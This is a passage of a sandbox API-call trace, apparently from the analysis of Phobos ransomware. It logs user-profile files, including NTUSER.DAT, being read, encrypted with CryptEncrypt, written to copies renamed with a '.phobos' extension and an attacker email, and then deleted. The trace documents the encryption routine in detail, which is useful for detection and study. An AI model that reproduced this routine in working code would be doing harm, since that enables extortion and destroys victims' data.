(lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.105] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=282) returned 1 [0203.105] CloseHandle (hObject=0x160) returned 1 [0203.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini")) returned 0x26 [0203.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\downloads\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.105] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.105] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\downloads\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.106] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.106] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11a, lpOverlapped=0x0) returned 1 [0203.107] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0203.107] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0203.107] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.107] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.107] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.108] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.108] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.108] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.108] CloseHandle (hObject=0x160) returned 1 [0203.108] CloseHandle (hObject=0xfc) returned 1 [0203.108] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini")) returned 1 [0203.109] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.109] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=402) returned 1 [0203.110] CloseHandle (hObject=0xfc) returned 1 [0203.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini")) returned 0x26 [0203.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.110] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.110] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.110] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.110] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.110] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x192, lpOverlapped=0x0) returned 1 [0203.111] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0) returned 1 [0203.111] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1a0, lpOverlapped=0x0) returned 1 [0203.112] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.112] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.112] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.112] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.112] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.112] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.112] CloseHandle (hObject=0xfc) returned 1 [0203.112] CloseHandle (hObject=0x160) returned 1 [0203.112] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini")) returned 1 [0203.113] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.114] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=80) returned 1 [0203.114] CloseHandle (hObject=0x160) returned 1 [0203.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini")) returned 0x26 [0203.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.114] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.114] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.120] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.120] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.120] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x50, lpOverlapped=0x0) returned 1 [0203.122] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0203.122] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x60, lpOverlapped=0x0) returned 1 [0203.123] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.123] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.123] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.123] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.123] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.123] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.123] CloseHandle (hObject=0x160) returned 1 [0203.123] CloseHandle (hObject=0xfc) returned 1 [0203.123] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini")) returned 1 [0203.124] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.125] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=580) returned 1 [0203.125] CloseHandle (hObject=0xfc) returned 1 [0203.125] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini")) returned 0x26 [0203.125] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\links\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.125] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.125] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\links\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.127] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.127] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.127] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x244, lpOverlapped=0x0) returned 1 [0203.127] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250, dwBufLen=0x250 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250) returned 1 [0203.128] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x250, lpOverlapped=0x0) returned 1 [0203.128] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.128] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.128] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.128] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.128] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.128] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.128] CloseHandle (hObject=0xfc) returned 1 [0203.128] CloseHandle (hObject=0x160) returned 1 [0203.129] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini")) returned 1 [0203.129] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.130] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=504) returned 1 [0203.130] CloseHandle (hObject=0x160) returned 1 [0203.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini")) returned 0x26 [0203.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\music\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.130] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.130] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\music\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.131] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.131] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.131] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1f8, lpOverlapped=0x0) returned 1 [0203.131] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200, dwBufLen=0x200 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200) returned 1 [0203.131] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x200, lpOverlapped=0x0) returned 1 [0203.132] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.132] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.132] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.132] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.132] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.132] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.132] CloseHandle (hObject=0x160) returned 1 [0203.132] CloseHandle (hObject=0xfc) returned 1 [0203.132] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini")) returned 1 [0203.135] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.135] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=786432) returned 1 [0203.135] CloseHandle (hObject=0xfc) returned 1 [0203.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat")) returned 0x2026 [0203.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.136] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.136] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.136] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.136] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.136] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc0000, lpOverlapped=0x0) returned 1 [0203.497] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0010, dwBufLen=0xc0010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0010) returned 1 [0203.504] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0010, lpOverlapped=0x0) returned 1 [0203.518] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.518] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.518] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.518] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.518] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.518] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.518] CloseHandle (hObject=0xfc) returned 1 [0203.518] CloseHandle (hObject=0x160) returned 1 [0203.518] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat")) returned 1 [0203.526] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.527] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=20) returned 1 [0203.527] CloseHandle (hObject=0x160) returned 1 [0203.527] GetFileAttributesW 